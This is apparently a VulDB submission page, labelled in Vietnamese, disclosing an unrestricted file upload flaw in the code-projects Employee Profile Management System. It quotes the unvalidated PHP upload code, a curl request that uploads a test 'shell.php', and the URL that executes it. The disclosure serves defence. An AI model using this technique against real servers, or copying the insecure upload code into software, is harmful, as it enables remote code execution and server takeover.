| tiêu đề | code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload |
|---|
| Mô tả | Summary
The vulnerability exists in the file upload component (Profiling/add_file_query.php) due to missing validation of uploaded file types and content. The application allows arbitrary files—including executable .php files—to be uploaded into a web-accessible directory.
Root Cause
The server stores uploaded files directly under Profiling/uploads/ using the original filename from the client:
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["per_file"]["name"]);
move_uploaded_file($_FILES["per_file"]["tmp_name"], $target_file);
There is no extension restriction, no MIME checking, no content inspection, no filename randomization, and the upload directory is inside the web root. Therefore, a user can upload a PHP file that the server later executes.
Reproduction
Login as a normal user who has access to the “Add File” feature.
Upload the following file as shell.php:
<?php echo "EXECUTED: " . __FILE__; ?>
Send the upload request (example using curl):
curl -X POST "http://localhost/Profiling/add_file_query.php" \
-F "per_name=1" \
-F "[email protected]" \
-F "upload=Save"
Access the uploaded file directly:
http://localhost/Profiling/uploads/shell.php
The PHP code executes and prints the message, confirming arbitrary code execution.
Impact
This allows remote attackers to upload and execute arbitrary PHP code on the server. Successful exploitation leads to full server compromise, including command execution, data theft, privilege escalation, and persistent backdoor installation. |
|---|
| Nguồn | ⚠️ https://github.com/shenxianyuguitian/employee-management-UFU |
|---|
| Người dùng | xuanyuesanshi (UID 88126) |
|---|
| Đệ trình | 21/11/2025 08:26 (cách đây 5 các tháng) |
|---|
| Kiểm duyệt | 06/12/2025 18:22 (15 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 334615 [code-projects Employee Profile Management System 1.0 add_file_query.php per_file nâng cao đặc quyền] |
|---|
| điểm | 20 |
|---|